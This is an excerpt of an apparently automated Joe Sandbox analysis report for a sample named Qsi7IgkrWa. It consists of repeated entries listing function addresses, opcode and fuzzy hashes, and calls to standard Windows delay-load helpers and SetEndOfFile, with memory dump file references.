Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eb3ba2211d6a711244c0f982b43b96284078f506047c74d60f5533881e7101ce
Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
Opcode Fuzzy Hash: eb3ba2211d6a711244c0f982b43b96284078f506047c74d60f5533881e7101ce
Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830

Function 00BCE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 66dec3d4064ad5391d5e1bea3c58a953cbc8cc20452e0109be3934c808e85c6f
Instruction ID: 8df0dc9512d25b885b6a3f8d39d012f5b9318df69d2e4c387cafd16bf8cd0fe8
Opcode Fuzzy Hash: 66dec3d4064ad5391d5e1bea3c58a953cbc8cc20452e0109be3934c808e85c6f
Instruction Fuzzy Hash: BEA011E22AA082FC300822022C03E3B02CCC0C0B2033088AEF822C0080AA80FA020830

Function 00BCE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 92f9821bcbedb2b83fefd61328fbe1da66be584d19248acd4747d8ba19f30722
Instruction ID: 96f932c4ff25a532fe7f0a3159a906d97338eb4827d2be2d857202b063357dff
Opcode Fuzzy Hash: 92f9821bcbedb2b83fefd61328fbe1da66be584d19248acd4747d8ba19f30722
Instruction Fuzzy Hash: 7AA011E22AA0C2BC320822022C03E3B028CC0C0B2033080EEF832EA080AC80A802083A

Function 00BCE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3a45cbf4d23fa96dee9551fcf8e024d64e722082a1cd737da07c1259eb0dc83d
Instruction ID: 4aca32f3234d373b4f97409ffe35179d26b928638a12c59c24678e7cdf238d7c
Opcode Fuzzy Hash: 3a45cbf4d23fa96dee9551fcf8e024d64e722082a1cd737da07c1259eb0dc83d
Instruction Fuzzy Hash: F3A011E22AA0C2FC320822022C03E3B028CC0C0B2033088EEF822CA080A880A802083A

Function 00BCE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 28e8d984bf627adf6f6d4d476fe61167c3699fa44ef16fb81c5556370849f005
Instruction ID: 4aca32f3234d373b4f97409ffe35179d26b928638a12c59c24678e7cdf238d7c
Opcode Fuzzy Hash: 28e8d984bf627adf6f6d4d476fe61167c3699fa44ef16fb81c5556370849f005
Instruction Fuzzy Hash: F3A011E22AA0C2FC320822022C03E3B028CC0C0B2033088EEF822CA080A880A802083A

Function 00BCE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 58dbbb6bdeb3183f778fe4a87495bd83b4a09c5b7f45a8b2170b60105c19ac91
Instruction ID: 4aca32f3234d373b4f97409ffe35179d26b928638a12c59c24678e7cdf238d7c
Opcode Fuzzy Hash: 58dbbb6bdeb3183f778fe4a87495bd83b4a09c5b7f45a8b2170b60105c19ac91
Instruction Fuzzy Hash: F3A011E22AA0C2FC320822022C03E3B028CC0C0B2033088EEF822CA080A880A802083A

Function 00BCE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 66ae06f900085839ee0435061cf7f1224b517bd61dea20d9477878fae413afb6
Instruction ID: 4aca32f3234d373b4f97409ffe35179d26b928638a12c59c24678e7cdf238d7c
Opcode Fuzzy Hash: 66ae06f900085839ee0435061cf7f1224b517bd61dea20d9477878fae413afb6
Instruction Fuzzy Hash: F3A011E22AA0C2FC320822022C03E3B028CC0C0B2033088EEF822CA080A880A802083A

Function 00BCE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 67c982b09abad7a988bf737c708342f8aecfe2910ffd710a1b05383a4faa4f88
Instruction ID: 4aca32f3234d373b4f97409ffe35179d26b928638a12c59c24678e7cdf238d7c
Opcode Fuzzy Hash: 67c982b09abad7a988bf737c708342f8aecfe2910ffd710a1b05383a4faa4f88
Instruction Fuzzy Hash: F3A011E22AA0C2FC320822022C03E3B028CC0C0B2033088EEF822CA080A880A802083A

Function 00BCE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE580

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2230d95c01ae75c47c3ea61fbd51ef5847d8fec321663de3b2c75665862f741e
Instruction ID: e329602ec6f4dc2a643a2a2b506e7661d530f6baf622b16f9248eb64faa45ab4
Opcode Fuzzy Hash: 2230d95c01ae75c47c3ea61fbd51ef5847d8fec321663de3b2c75665862f741e
Instruction Fuzzy Hash: E3A011C22AA082FC300822A22C02E3B028CC0C0B2033088AEF82282080B88088020830

Function 00BCE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE580

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bb77093777ee02ad3bececbd2267ac61b307aaf0dcbdd625a929a2bb648e62a9
Instruction ID: e329602ec6f4dc2a643a2a2b506e7661d530f6baf622b16f9248eb64faa45ab4
Opcode Fuzzy Hash: bb77093777ee02ad3bececbd2267ac61b307aaf0dcbdd625a929a2bb648e62a9
Instruction Fuzzy Hash: E3A011C22AA082FC300822A22C02E3B028CC0C0B2033088AEF82282080B88088020830

Function 00BCE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE580

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e8527d71f603502e6ca22f2276ee51d4008ba272c401b5e22f7fee48c4eb0bf8
Instruction ID: 0864f95917e00dea2bbb8e478a0da8babdb644c3242df804f18ed3bded934701
Opcode Fuzzy Hash: e8527d71f603502e6ca22f2276ee51d4008ba272c401b5e22f7fee48c4eb0bf8
Instruction Fuzzy Hash: 31A011C22AA080BC300822A22C02E3B0A8CC0E0B2233082AEF820A2080B88088020830

Function 00BCE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3fec27401659cc0925d0d343c5e433e8cd2a1cad7c5e1dca9c0065460ccba5cf
Instruction ID: 2282fc7e24d78f14aa1781351a26dda6358545370537cd90fac57344c96ed0b3
Opcode Fuzzy Hash: 3fec27401659cc0925d0d343c5e433e8cd2a1cad7c5e1dca9c0065460ccba5cf
Instruction Fuzzy Hash: 2EA011C22AA282FC300822022C02E3B0A8CC0C2F2033088AEF82280080B8808C020830

Function 00BCE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 54b7c30ab9f09bc1ed21beecd55f997512750afd576712f7c8c9cb7f1bc7ad26
Instruction ID: 2282fc7e24d78f14aa1781351a26dda6358545370537cd90fac57344c96ed0b3
Opcode Fuzzy Hash: 54b7c30ab9f09bc1ed21beecd55f997512750afd576712f7c8c9cb7f1bc7ad26
Instruction Fuzzy Hash: 2EA011C22AA282FC300822022C02E3B0A8CC0C2F2033088AEF82280080B8808C020830

Function 00BCE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 55a07f84f2e123a6b0b4720e92c6ced8dfe67980e10b956cedef64cf9cca350c
Instruction ID: 2282fc7e24d78f14aa1781351a26dda6358545370537cd90fac57344c96ed0b3
Opcode Fuzzy Hash: 55a07f84f2e123a6b0b4720e92c6ced8dfe67980e10b956cedef64cf9cca350c
Instruction Fuzzy Hash: 2EA011C22AA282FC300822022C02E3B0A8CC0C2F2033088AEF82280080B8808C020830

Function 00BCE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCE51F

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ddcfd5aa2004b337583b124f87f652856b32205ba94ad68e7bf6abdf37cc08a7
Instruction ID: 2282fc7e24d78f14aa1781351a26dda6358545370537cd90fac57344c96ed0b3
Opcode Fuzzy Hash: ddcfd5aa2004b337583b124f87f652856b32205ba94ad68e7bf6abdf37cc08a7
Instruction Fuzzy Hash: 2EA011C22AA282FC300822022C02E3B0A8CC0C2F2033088AEF82280080B8808C020830

Function 00BB9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00BB903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00BB9F0C

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
